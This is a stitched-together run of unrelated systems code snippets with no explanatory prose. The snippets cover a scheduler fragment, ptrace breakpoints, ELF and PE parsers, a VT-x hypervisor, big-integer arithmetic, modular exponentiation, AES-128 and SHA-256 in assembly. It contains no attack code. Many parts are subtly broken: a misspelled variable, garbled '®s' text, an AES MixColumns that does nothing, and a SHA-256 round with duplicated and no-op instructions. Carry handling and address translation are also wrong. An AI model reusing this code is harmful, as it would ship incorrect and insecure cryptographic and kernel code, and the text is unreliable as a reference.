// Find next ready task
int found = 0;
for (int i = 0; i < MAX_TASKS; i++) {
next_task = (next_task + 1) % MAX_TASKS;
if (tasks[next_task].state == 1) {
found = 1;
break;
}
}
if (!found) {
// No tasks, just return
return;
}
// Switch to next task
current_task = next_task;
tasks[current_task].state = 2;
// Restore task state
__asm__ volatile(
"mov %0, %%esp\n"
"mov %1, %%ebp\n"
:
: "r"(tasks[current_task].esp),
"r"(tasks[current_task].ebp)
);
}Software Breakpoints (INT3)
// Set software breakpoint
void set_breakpoint(pid_t pid, void *addr) {
// Save original instruction
unsigned char original;
read_process_memory(pid, addr, &original, 1);
// Write INT3 (0xCC)
unsigned char int3 = 0xCC;
write_process_memory(pid, addr, &int3, 1);
// Store original for later
breakpoint *bp = malloc(sizeof(breakpoint));
bp->addr = addr;
bp->original = original;
// Add to breakpoint list
}
// Handle breakpoint hit
void handle_breakpoint(pid_t pid) {
// Get register context
struct user_regs_struct regs;
ptrace(PTRACE_GETREGS, pid, NULL, ®s);
// RIP points to next instruction after INT3
void *bp_addr = (void*)(regs.rip - 1);
// Restore original instruction
breakpoint *bp = find_breakpoint(bp_addr);
write_process_memory(pid, bp_addr, &bp->original, 1);
// Single-step to execute original instruction
ptrace(PTRACE_SINGLESTEP, pid, NULL, NULL);
wait(NULL);
// Re-insert breakpoint
unsigned char int3 = 0xCC;
write_process_memory(pid, bp_addr, &int3, 1);
// Continue execution
ptrace(PTRACE_CONT, pid, NULL, NULL);
}Hardware Breakpoints
; Set hardware breakpoint via debug registers
set_hw_breakpoint:
; DR0 = breakpoint address
mov rax, [breakpoint_addr]
mov dr0, rax
; DR7 = enable breakpoint 0, type = execution
mov rax, 0x1 ; L0 = 1
or rax, 0x300 ; R/W0 = 00 (execution)
or rax, 0x30000 ; LEN0 = 00 (1 byte)
mov dr7, rax
retReading Registers with ptrace
void print_registers(pid_t pid) {
struct user_regs_struct regs;
if (ptrace(PTRACE_GETREGS, pid, NULL, ®s) == -1) {
perror("ptrace GETREGS");
return;
}
printf("RAX: 0x%016llx\n", regs.rax);
printf("RBX: 0x%016llx\n", regs.rbx);
printf("RCX: 0x%016llx\n", regs.rcx);
printf("RDX: 0x%016llx\n", regs.rdx);
printf("RSI: 0x%016llx\n", regs.rsi);
printf("RDI: 0x%016llx\n", regs.rdi);
printf("RBP: 0x%016llx\n", regs.rbp);
printf("RSP: 0x%016llx\n", regs.rsp);
printf("RIP: 0x%016llx\n", regs.rip);
printf("EFLAGS: 0x%08llx\n", regs.eflags);
}Simple Disassembler
// Simple x86 disassembler for common instructions
typedef struct {
char mnemonic[16];
char operands[64];
} instruction_t;
instruction_t disassemble(unsigned char *code, size_t *size) {
instruction_t inst = {0};
unsigned char opcode = code[0];
switch (opcode) {
case 0x90:
strcpy(inst.mnemonic, "nop");
*size = 1;
break;
case 0xC3:
strcpy(inst.mnemonic, "ret");
*size = 1;
break;
case 0xCC:
strcpy(inst.mnemonic, "int3");
*size = 1;
break;
case 0x50 ... 0x57: // push r64
strcpy(inst.mnemonic, "push");
sprintf(inst.operands, "r%x", opcode - 0x50);
*size = 1;
break;
case 0x58 ... 0x5F: // pop r64
strcpy(inst.mnemonic, "pop");
sprintf(inst.operands, "r%x", opcode - 0x58);
*size = 1;
break;
case 0xB8 ... 0xBF: // mov r32, imm32
strcpy(inst.mnemonic, "mov");
sprintf(inst.operands, "e%x, 0x%x",
opcode - 0xB8, *(uint32_t*)(code + 1));
*size = 5;
break;
default:
strcpy(inst.mnemonic, "db");
sprintf(inst.operands, "0x%02x", opcode);
*size = 1;
}
return inst;
}// elf_parser.c
#include <stdio.h>
#include <stdlib.h>
#include <elf.h>
typedef struct {
FILE *fp;
Elf64_Ehdr ehdr;
Elf64_Phdr *phdr;
Elf64_Shdr *shdr;
char *shstrtab;
} elf_file_t;
elf_file_t* elf_open(const char *filename) {
elf_file_t *elf = malloc(sizeof(elf_file_t));
elf->fp = fopen(filename, "rb");
if (!elf->fp) {
free(elf);
return NULL;
}
// Read ELF header
fread(&elf->ehdr, sizeof(Elf64_Ehdr), 1, elf->fp);
// Verify ELF magic
if (elf->ehdr.e_ident[EI_MAG0] != ELFMAG0 ||
elf->ehdr.e_ident[EI_MAG1] != ELFMAG1 ||
elf->ehdr.e_ident[EI_MAG2] != ELFMAG2 ||
elf->ehdr.e_ident[EI_MAG3] != ELFMAG3) {
fclose(elf->fp);
free(elf);
return NULL;
}
// Read program headers
elf->phdr = malloc(elf->ehdr.e_phnum * sizeof(Elf64_Phdr));
fseek(elf->fp, elf->ehdr.e_phoff, SEEK_SET);
fread(elf->phdr, sizeof(Elf64_Phdr), elf->ehdr.e_phnum, elf->fp);
// Read section headers
elf->shdr = malloc(elf->ehdr.e_shnum * sizeof(Elf64_Shdr));
fseek(elf->fp, elf->ehdr.e_shoff, SEEK_SET);
fread(elf->shdr, sizeof(Elf64_Shdr), elf->ehdr.e_shnum, elf->fp);
// Read section header string table
if (elf->ehdr.e_shstrndx != SHN_UNDEF) {
Elf64_Shdr *shstr = &elf->shdr[elf->ehdr.e_shstrndx];
elf->shstrtab = malloc(shstr->sh_size);
fseek(elf->fp, shstr->sh_offset, SEEK_SET);
fread(elf->shstrtab, 1, shstr->sh_size, elf->fp);
}
return elf;
}
void elf_print_info(elf_file_t *elf) {
printf("ELF Type: ");
switch (elf->ehdr.e_type) {
case ET_REL: printf("REL (Relocatable)\n"); break;
case ET_EXEC: printf("EXEC (Executable)\n"); break;
case ET_DYN: printf("DYN (Shared object)\n"); break;
default: printf("Unknown\n");
}
printf("Entry point: 0x%lx\n", elf->ehdr.e_entry);
printf("Program headers: %d\n", elf->ehdr.e_phnum);
printf("Section headers: %d\n", elf->ehdr.e_shnum);
// Print program headers
for (int i = 0; i < elf->ehdr.e_phnum; i++) {
Elf64_Phdr *p = &elf->phdr[i];
printf("PHDR %d: type=%d vaddr=0x%lx memsz=%ld\n",
i, p->p_type, p->p_vaddr, p->p_memsz);
}
// Print sections
for (int i = 0; i < elf->ehdr.e_shnum; i++) {
Elf64_Shdr *s = &elf->shdr[i];
char *name = elf->shstrtab + s->sh_name;
printf("SEC %d: %-12s addr=0x%lx size=%ld\n",
i, name, s->sh_addr, s->sh_size);
}
}
void elf_close(elf_file_t *elf) {
fclose(elf->fp);
free(elf->phdr);
free(elf->shdr);
if (elf->shstrtab) free(elf->shstrtab);
free(elf);
}// pe_parser.c
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
typedef struct {
FILE *fp;
IMAGE_DOS_HEADER dos_header;
IMAGE_NT_HEADERS nt_headers;
IMAGE_SECTION_HEADER *sections;
} pe_file_t;
pe_file_t* pe_open(const char *filename) {
pe_file_t *pe = malloc(sizeof(pe_file_t));
pe->fp = fopen(filename, "rb");
if (!pe->fp) {
free(pe);
return NULL;
}
// Read DOS header
fread(&pe->dos_header, sizeof(IMAGE_DOS_HEADER), 1, pe->fp);
// Verify DOS magic
if (pe->dos_header.e_magic != IMAGE_DOS_SIGNATURE) {
fclose(pe->fp);
free(pe);
return NULL;
}
// Seek to NT headers
fseek(pe->fp, pe->dos_header.e_lfanew, SEEK_SET);
// Read NT headers
fread(&pe->nt_headers, sizeof(IMAGE_NT_HEADERS), 1, pe->fp);
// Verify PE signature
if (pe->nt_headers.Signature != IMAGE_NT_SIGNATURE) {
fclose(pe->fp);
free(pe);
return NULL;
}
// Read section headers
int num_sections = pe->nt_headers.FileHeader.NumberOfSections;
pe->sections = malloc(num_sections * sizeof(IMAGE_SECTION_HEADER));
fread(pe->sections, sizeof(IMAGE_SECTION_HEADER),
num_sections, pe->fp);
return pe;
}
void pe_print_info(pe_file_t *pe) {
IMAGE_FILE_HEADER *file = &pe->nt_headers.FileHeader;
IMAGE_OPTIONAL_HEADER *opt = &pe->nt_headers.OptionalHeader;
printf("Machine: 0x%04x\n", file->Machine);
printf("Sections: %d\n", file->NumberOfSections);
printf("Entry point: 0x%08x\n", opt->AddressOfEntryPoint);
printf("Image base: 0x%016llx\n", opt->ImageBase);
// Print sections
for (int i = 0; i < file->NumberOfSections; i++) {
IMAGE_SECTION_HEADER *s = &pe->sections[i];
printf("SEC %d: %-8s vaddr=0x%08x size=%d\n",
i, s->Name, s->VirtualAddress, s->SizeOfRawData);
}
}
void pe_close(pe_file_t *pe) {
fclose(pe->fp);
free(pe->sections);
free(pe);
} EXIT_QUALIFICATION = 0x6000,
IO_RCX = 0x6002,
IO_RSI = 0x6004,
IO_RDI = 0x6006,
IO_RIP = 0x6008,
GUEST_LINEAR_ADDRESS = 0x600A,
GUEST_CR0 = 0x600C,
GUEST_CR3 = 0x600E,
GUEST_CR4 = 0x6010,
GUEST_ES_BASE = 0x6012,
GUEST_CS_BASE = 0x6014,
GUEST_SS_BASE = 0x6016,
GUEST_DS_BASE = 0x6018,
GUEST_FS_BASE = 0x601A,
GUEST_GS_BASE = 0x601C,
GUEST_LDTR_BASE = 0x601E,
GUEST_TR_BASE = 0x6020,
GUEST_GDTR_BASE = 0x6022,
GUEST_IDTR_BASE = 0x6024,
GUEST_DR7 = 0x6026,
GUEST_RSP = 0x6028,
GUEST_RIP = 0x602A,
GUEST_RFLAGS = 0x602C,
GUEST_PENDING_DBG_EXCEPTIONS = 0x602E,
GUEST_SYSENTER_ESP = 0x6030,
GUEST_SYSENTER_EIP = 0x6032,
HOST_CR0 = 0x6034,
HOST_CR3 = 0x6036,
HOST_CR4 = 0x6038,
HOST_FS_BASE = 0x603A,
HOST_GS_BASE = 0x603C,
HOST_TR_BASE = 0x603E,
HOST_GDTR_BASE = 0x6040,
HOST_IDTR_BASE = 0x6042,
HOST_RSP = 0x6044,
HOST_RIP = 0x6046
};// hypervisor.c - Minimal VT-x hypervisor
#include <stdint.h>
#include <string.h>
// VMX region structures
typedef struct {
uint32_t revision_id;
uint32_t abort_indicator;
uint8_t data[0];
} __attribute__((packed)) vmxon_region_t;
typedef struct {
uint32_t revision_id;
uint8_t data[0];
} __attribute__((packed)) vmcs_t;
// VM-exit information
typedef struct {
uint64_t exit_reason;
uint64_t exit_qualification;
uint64_t guest_linear_address;
uint64_t guest_physical_address;
uint64_t instruction_length;
uint64_t instruction_info;
uint64_t interrupt_info;
uint64_t error_code;
} __attribute__((packed)) vm_exit_info_t;
// Global state
static vmxon_region_t *vmxon_region;
static vmcs_t *vmcs;
static void *vmxon_region_physical;
static void *vmcs_physical;
// Check for VMX support
int vmx_supported(void) {
uint32_t eax, ebx, ecx, edx;
// Check CPUID.1:ECX.VMX bit
__asm__ volatile("cpuid"
: "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx)
: "a"(1));
if (!(ecx & (1 << 5))) {
return 0; // VMX not supported
}
// Check CR4.VMXE bit can be set
uint64_t cr4;
__asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
cr4 |= (1 << 13); // VMXE bit
__asm__ volatile("mov %0, %%cr4" : : "r"(cr4));
__asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
if (!(cr4 & (1 << 13))) {
return 0; // Cannot enable VMX
}
return 1;
}
// Initialize VMX
int vmx_init(void) {
if (!vmx_supported()) {
return -1;
}
// Allocate VMXON region (4KB aligned)
vmxon_region = aligned_alloc(4096, 4096);
if (!vmxon_region) {
return -1;
}
memset(vmxon_region, 0, 4096);
// Get VMX revision ID from IA32_VMX_BASIC MSR
uint32_t msrl, msrh;
__asm__ volatile("rdmsr" : "=a"(msrl), "=d"(msrh) : "c"(0x480));
vmxon_region->revision_id = msrl & 0x7FFFFFFF;
// Store physical address
vmxon_region_physical = (void*)((uint64_t)vmxon_region & 0xFFFFFFFFFFFFF000);
// Execute VMXON
int success;
__asm__ volatile(
"vmxon %[pa]\n"
"setna %0\n"
: "=q"(success)
: [pa] "m"(vmxon_region_physical)
: "cc", "memory"
);
if (success) {
free(vmxon_region);
return -1;
}
// Allocate VMCS (4KB aligned)
vmcs = aligned_alloc(4096, 4096);
if (!vmcs) {
vmxoff();
free(vxon_region);
return -1;
}
memset(vmcs, 0, 4096);
vmcs->revision_id = msrl & 0x7FFFFFFF;
vmcs_physical = (void*)((uint64_t)vmcs & 0xFFFFFFFFFFFFF000);
// Clear and load VMCS
__asm__ volatile(
"vmclear %[pa]\n"
"vmptrld %[pa]\n"
:
: [pa] "m"(vmcs_physical)
: "cc", "memory"
);
return 0;
}
// Configure VMCS for guest
void vmx_setup_guest(void) {
// Host state
uint64_t cr0, cr3, cr4, rsp, rip;
__asm__ volatile("mov %%cr0, %0" : "=r"(cr0));
__asm__ volatile("mov %%cr3, %0" : "=r"(cr3));
__asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
__asm__ volatile("mov %%rsp, %0" : "=r"(rsp));
// Get host RIP (return address after VM exit)
rip = (uint64_t)vm_exit_handler;
// Write host state to VMCS
vmwrite(HOST_CR0, cr0);
vmwrite(HOST_CR3, cr3);
vmwrite(HOST_CR4, cr4);
vmwrite(HOST_RSP, rsp);
vmwrite(HOST_RIP, rip);
// Set up control fields
uint32_t pin_ctls = 0;
uint32_t cpu_ctls = CPU_BASED_HLT_EXITING |
CPU_BASED_CR8_LOAD_EXITING |
CPU_BASED_CR8_STORE_EXITING |
CPU_BASED_USE_MSR_BITMAPS;
vmwrite(PIN_BASED_VM_EXEC_CONTROL, pin_ctls);
vmwrite(CPU_BASED_VM_EXEC_CONTROL, cpu_ctls);
// Set up exit controls
uint32_t exit_ctls = 0;
vmwrite(VM_EXIT_CONTROLS, exit_ctls);
// Set up entry controls
uint32_t entry_ctls = 0;
vmwrite(VM_ENTRY_CONTROLS, entry_ctls);
}
// VM exit handler
void vm_exit_handler(void) {
uint64_t exit_reason;
uint64_t exit_qualification;
// Read exit reason
vmread(VM_EXIT_REASON, &exit_reason);
vmread(EXIT_QUALIFICATION, &exit_qualification);
// Handle different exit reasons
switch (exit_reason & 0xFFFF) {
case 0: // Exception or NMI
handle_exception(exit_qualification);
break;
case 10: // CPUID
handle_cpuid();
break;
case 12: // HLT
handle_hlt();
break;
case 18: // VMCALL
handle_vmcall();
break;
default:
// Unknown exit - just resume
break;
}
// Return to guest
__asm__ volatile("vmresume");
}
// Launch guest
void vmx_launch_guest(void) {
int failed;
__asm__ volatile(
"vmlaunch\n"
"setna %0\n"
: "=q"(failed)
:
: "cc", "memory"
);
if (failed) {
// VM launch failed - check VMCS
uint64_t error;
vmread(VM_INSTRUCTION_ERROR, &error);
printf("VMLAUNCH failed: error %llu\n", error);
}
}// bigint.h - Big integer library
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
typedef struct {
uint64_t *words; // Array of 64-bit words
size_t size; // Number of words
int sign; // 0 positive, 1 negative
} bigint_t;
// Create new big integer
bigint_t* bigint_new(size_t size) {
bigint_t *bn = malloc(sizeof(bigint_t));
bn->words = calloc(size, sizeof(uint64_t));
bn->size = size;
bn->sign = 0;
return bn;
}
// Free big integer
void bigint_free(bigint_t *bn) {
free(bn->words);
free(bn);
}; bigint_add.asm - Big integer addition
; RDI = destination, RSI = first, RDX = second, RCX = word count
global bigint_add
bigint_add:
push rbp
mov rbp, rsp
xor rax, rax ; clear carry
mov r8, rcx ; counter
.loop:
mov r9, [rsi + r8*8 - 8] ; load from first
mov r10, [rdx + r8*8 - 8] ; load from second
; Add with carry
add r9, r10
adc rax, 0 ; capture carry
; Store result
mov [rdi + r8*8 - 8], r9
dec r8
jnz .loop
; Return final carry
pop rbp
ret
; bigint_sub.asm - Big integer subtraction
global bigint_sub
bigint_sub:
push rbp
mov rbp, rsp
xor rax, rax ; clear borrow
mov r8, rcx ; counter
.loop:
mov r9, [rsi + r8*8 - 8]
mov r10, [rdx + r8*8 - 8]
; Subtract with borrow
sub r9, r10
sbb rax, 0 ; capture borrow
mov [rdi + r8*8 - 8], r9
dec r8
jnz .loop
pop rbp
ret// bigint_mul.c - Karatsuba multiplication
#include "bigint.h"
// Helper: add two big integers
void bigint_add_to(bigint_t *dest, bigint_t *src) {
uint64_t carry = 0;
for (size_t i = 0; i < dest->size && i < src->size; i++) {
uint64_t sum = dest->words[i] + src->words[i] + carry;
dest->words[i] = sum;
carry = (sum < dest->words[i]) ? 1 : 0;
}
}
// Karatsuba multiplication
bigint_t* bigint_mul(bigint_t *a, bigint_t *b) {
size_t n = (a->size > b->size) ? a->size : b->size;
// Base case: single word multiplication
if (n == 1) {
bigint_t *result = bigint_new(2);
uint64_t low, high;
// Multiply 64-bit values
__asm__(
"mulq %[b]\n"
: "=a"(low), "=d"(high)
: "a"(a->words[0]), [b]"r"(b->words[0])
);
result->words[0] = low;
result->words[1] = high;
return result;
}
// Split into halves
size_t m = n / 2;
bigint_t *a_low = bigint_new(m);
bigint_t *a_high = bigint_new(n - m);
bigint_t *b_low = bigint_new(m);
bigint_t *b_high = bigint_new(n - m);
memcpy(a_low->words, a->words, m * 8);
memcpy(a_high->words, a->words + m, (n - m) * 8);
memcpy(b_low->words, b->words, m * 8);
memcpy(b_high->words, b->words + m, (n - m) * 8);
// Recursive multiplications
bigint_t *z0 = bigint_mul(a_low, b_low);
bigint_t *z2 = bigint_mul(a_high, b_high);
// (a_low + a_high) * (b_low + b_high)
bigint_t *a_sum = bigint_new(m + (n - m));
bigint_t *b_sum = bigint_new(m + (n - m));
bigint_add_to(a_sum, a_low);
bigint_add_to(a_sum, a_high);
bigint_add_to(b_sum, b_low);
bigint_add_to(b_sum, b_high);
bigint_t *z1 = bigint_mul(a_sum, b_sum);
// z1 = z1 - z0 - z2
for (size_t i = 0; i < z1->size; i++) {
if (i < z0->size) z1->words[i] -= z0->words[i];
if (i < z2->size) z1->words[i] -= z2->words[i];
}
// Combine: result = z0 + (z1 << m) + (z2 << 2m)
bigint_t *result = bigint_new(2 * n);
// Add z0
memcpy(result->words, z0->words, z0->size * 8);
// Add z1 at offset m
for (size_t i = 0; i < z1->size; i++) {
result->words[i + m] += z1->words[i];
}
// Add z2 at offset 2m
for (size_t i = 0; i < z2->size; i++) {
result->words[i + 2*m] += z2->words[i];
}
// Handle carries
uint64_t carry = 0;
for (size_t i = 0; i < result->size; i++) {
result->words[i] += carry;
carry = (result->words[i] < carry) ? 1 : 0;
}
bigint_free(a_low); bigint_free(a_high);
bigint_free(b_low); bigint_free(b_high);
bigint_free(a_sum); bigint_free(b_sum);
bigint_free(z0); bigint_free(z1); bigint_free(z2);
return result;
}; mod_exp.asm - Modular exponentiation (RSA-style)
; RDI = base, RSI = exponent, RDX = modulus
; Returns: (base^exponent) % modulus
global mod_exp
mod_exp:
push rbp
mov rbp, rsp
push rbx
push r12
push r13
push r14
mov rax, 1 ; result = 1
mov rbx, rdi ; base
mov rcx, rsi ; exponent
mov r12, rdx ; modulus
.exp_loop:
test rcx, 1 ; check LSB of exponent
jz .skip_mul
; result = (result * base) % modulus
mul rbx
div r12
mov rax, rdx ; remainder becomes new result
.skip_mul:
; base = (base * base) % modulus
mov rax, rbx
mul rbx
div r12
mov rbx, rdx
; exponent >>= 1
shr rcx, 1
jnz .exp_loop
pop r14
pop r13
pop r12
pop rbx
pop rbp
ret; aes.asm - AES-128 implementation
section .data
; AES S-box
sbox:
db 0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76
db 0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0
db 0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15
db 0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75
db 0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84
db 0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf
db 0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8
db 0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2
db 0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73
db 0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb
db 0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79
db 0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08
db 0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a
db 0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e
db 0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf
db 0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16
; Round constants
rcon:
db 0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80,0x1b,0x36
section .text
global aes_encrypt_block
; AES-128 encrypt one block
; RDI = input block (16 bytes)
; RSI = output block (16 bytes)
; RDX = round keys (176 bytes)
aes_encrypt_block:
push rbp
mov rbp, rsp
push rbx
push r12
push r13
push r14
push r15
; Copy input to state (XMM0)
movdqu xmm0, [rdi]
; Initial AddRoundKey
movdqu xmm1, [rdx]
pxor xmm0, xmm1
; 9 main rounds
mov rcx, 9
mov rbx, rdx
add rbx, 16 ; point to round key 1
.round_loop:
; SubBytes - using lookup table
call sub_bytes
; ShiftRows
call shift_rows
; MixColumns
call mix_columns
; AddRoundKey
movdqu xmm1, [rbx]
pxor xmm0, xmm1
add rbx, 16 ; next round key
dec rcx
jnz .round_loop
; Final round (no MixColumns)
call sub_bytes
call shift_rows
; Final AddRoundKey
movdqu xmm1, [rbx]
pxor xmm0, xmm1
; Store result
movdqu [rsi], xmm0
pop r15
pop r14
pop r13
pop r12
pop rbx
pop rbp
ret
; SubBytes transformation
sub_bytes:
push rbp
mov rbp, rsp
; Process each byte using S-box
; This is a simplified version - real implementation would use
; vectorized lookups or Galois field arithmetic
; For demonstration, using scalar code
movdqa [rsp-16], xmm0 ; save on stack
xor rcx, rcx
.loop:
movzx rax, byte [rsp-16 + rcx]
mov al, [sbox + rax]
mov [rsp-16 + rcx], al
inc rcx
cmp rcx, 16
jl .loop
movdqa xmm0, [rsp-16]
pop rbp
ret
; ShiftRows transformation
shift_rows:
; AES shift rows:
; Row 0: no shift
; Row 1: shift left 1
; Row 2: shift left 2
; Row 3: shift left 3
; Using byte shuffling
; This is a simplified version
pshufb xmm0, [shift_row_mask]
ret
shift_row_mask:
db 0x00, 0x05, 0x0a, 0x0f ; row 0
db 0x04, 0x09, 0x0e, 0x03 ; row 1
db 0x08, 0x0d, 0x02, 0x07 ; row 2
db 0x0c, 0x01, 0x06, 0x0b ; row 3
; MixColumns transformation
mix_columns:
; MixColumns multiplies each column by fixed matrix
; Using xtime operations
push rbp
mov rbp, rsp
sub rsp, 16
movdqa [rsp], xmm0
; Process each column
xor rcx, rcx
.col_loop:
; Load column bytes
movzx eax, byte [rsp + rcx*4]
movzx ebx, byte [rsp + rcx*4 + 1]
movzx edx, byte [rsp + rcx*4 + 2]
movzx esi, byte [rsp + rcx*4 + 3]
; xtime function (multiply by 2 in GF(2^8))
; This is simplified - real implementation uses lookup tables
; Store back column
; (simplified - real MixColumns uses matrix multiplication)
inc rcx
cmp rcx, 4
jl .col_loop
movdqa xmm0, [rsp]
add rsp, 16
pop rbp
ret; AES-128 Key Expansion
; RDI = key (16 bytes)
; RSI = round keys buffer (176 bytes)
global aes_key_expansion
aes_key_expansion:
push rbp
mov rbp, rsp
push rbx
push r12
; Copy original key to first 16 bytes
mov rcx, 4
xor rbx, rbx
.copy_key:
mov eax, [rdi + rbx*4]
mov [rsi + rbx*4], eax
inc rbx
loop .copy_key
; Generate remaining round keys
mov rcx, 10 ; 10 rounds
mov rbx, 4 ; word index
.key_exp_loop:
; Get previous word
mov eax, [rsi + (rbx-1)*4]
; RotWord
rol eax, 8
; SubWord
call sub_word
; XOR with Rcon
movzx r12, byte [rcon + rcx-1]
xor al, r12l
; XOR with word from 4 positions back
xor eax, [rsi + (rbx-4)*4]
; Store
mov [rsi + rbx*4], eax
inc rbx
; Generate remaining 3 words of this round
mov r8, 3
.gen_word:
mov eax, [rsi + (rbx-1)*4]
xor eax, [rsi + (rbx-4)*4]
mov [rsi + rbx*4], eax
inc rbx
dec r8
jnz .gen_word
loop .key_exp_loop
pop r12
pop rbx
pop rbp
ret
; Substitute each byte of EAX using S-box
sub_word:
push rbx
mov bl, al
mov al, [sbox + rbx]
shr eax, 8
mov bl, al
mov al, [sbox + rbx]
shl eax, 8
shr eax, 8
pop rbx
ret; sha256.asm - SHA-256 implementation
section .data
; SHA-256 initial hash values
h0 dd 0x6a09e667
h1 dd 0xbb67ae85
h2 dd 0x3c6ef372
h3 dd 0xa54ff53a
h4 dd 0x510e527f
h5 dd 0x9b05688c
h6 dd 0x1f83d9ab
h7 dd 0x5be0cd19
; SHA-256 round constants
k:
dd 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5
dd 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5
dd 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3
dd 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174
dd 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc
dd 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da
dd 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7
dd 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967
dd 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13
dd 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85
dd 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3
dd 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070
dd 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5
dd 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3
dd 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208
dd 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2
section .text
global sha256_transform
; SHA-256 transform function
; RDI = state (8 dwords)
; RSI = block (64 bytes)
sha256_transform:
push rbp
mov rbp, rsp
sub rsp, 64 ; allocate w[0..15] on stack
push rbx
push r12
push r13
push r14
push r15
; Initialize working variables a-h
mov eax, [rdi] ; a
mov ebx, [rdi+4] ; b
mov ecx, [rdi+8] ; c
mov edx, [rdi+12] ; d
mov r8d, [rdi+16] ; e
mov r9d, [rdi+20] ; f
mov r10d, [rdi+24] ; g
mov r11d, [rdi+28] ; h
; Copy block to w[0..15] (big-endian to host)
xor r12, r12
.prep_loop:
mov r13d, [rsi + r12*4]
bswap r13d ; convert from big-endian
mov [rsp + r12*4], r13d
inc r12
cmp r12, 16
jl .prep_loop
; Main loop: for t = 0 to 63
xor r12, r12 ; t = 0
.main_loop:
; Prepare message schedule for t >= 16
cmp r12, 16
jl .skip_schedule
; w[t] = sigma1(w[t-2]) + w[t-7] + sigma0(w[t-15]) + w[t-16]
mov r13d, [rsp + (r12-2)*4]
call sigma1
mov r14d, eax
mov eax, [rsp + (r12-7)*4]
add r14d, eax
mov eax, [rsp + (r12-15)*4]
call sigma0
add r14d, eax
add r14d, [rsp + (r12-16)*4]
mov [rsp + r12*4], r14d
.skip_schedule:
; T1 = h + Sigma1(e) + Ch(e,f,g) + k[t] + w[t]
mov eax, r8d
call Sigma1
add eax, r11d ; + h
add eax, r11d ; (h already in r11)
; Ch(e,f,g) = (e & f) ^ (~e & g)
mov r13d, r8d
and r13d, r9d
mov r14d, r8d
not r14d
and r14d, r10d
xor r13d, r14d
add eax, r13d
add eax, [k + r12*4] ; + k[t]
add eax, [rsp + r12*4] ; + w[t]
mov r13d, eax ; T1 in r13d
; T2 = Sigma0(a) + Maj(a,b,c)
mov eax, eax
call Sigma0
mov r14d, eax
; Maj(a,b,c) = (a & b) ^ (a & c) ^ (b & c)
mov eax, eax
and eax, ebx
mov r15d, eax
mov eax, eax
and eax, ecx
xor r15d, eax
mov eax, ebx
and eax, ecx
xor r15d, eax
add r14d, r15d ; T2
; Update registers
mov r11d, r10d ; h = g
mov r10d, r9d ; g = f
mov r9d, r8d ; f = e
add r8d, r13d ; e = d + T1
mov r8d, edx
add r8d, r13d
mov edx, ecx ; d = c
mov ecx, ebx ; c = b
mov ebx, eax ; b = a
mov eax, r13d
add eax, r14d ; a = T1 + T2
inc r12
cmp r12, 64
jl .main_loop
; Add results to state
add [rdi], eax
add [rdi+4], ebx
add [rdi+8], ecx
add [rdi+12], edx
add [rdi+16], r8d
add [rdi+20], r9d
add [rdi+24], r10d
add [rdi+28], r11d
pop r15
pop r14
pop r13
pop r12
pop rbx
mov rsp, rbp
pop rbp
ret
; Sigma0 function (for 32-bit values)
Sigma0:
mov r13d, eax
ror eax, 2
ror r13d, 13
xor eax, r13d
ror r13d, 22
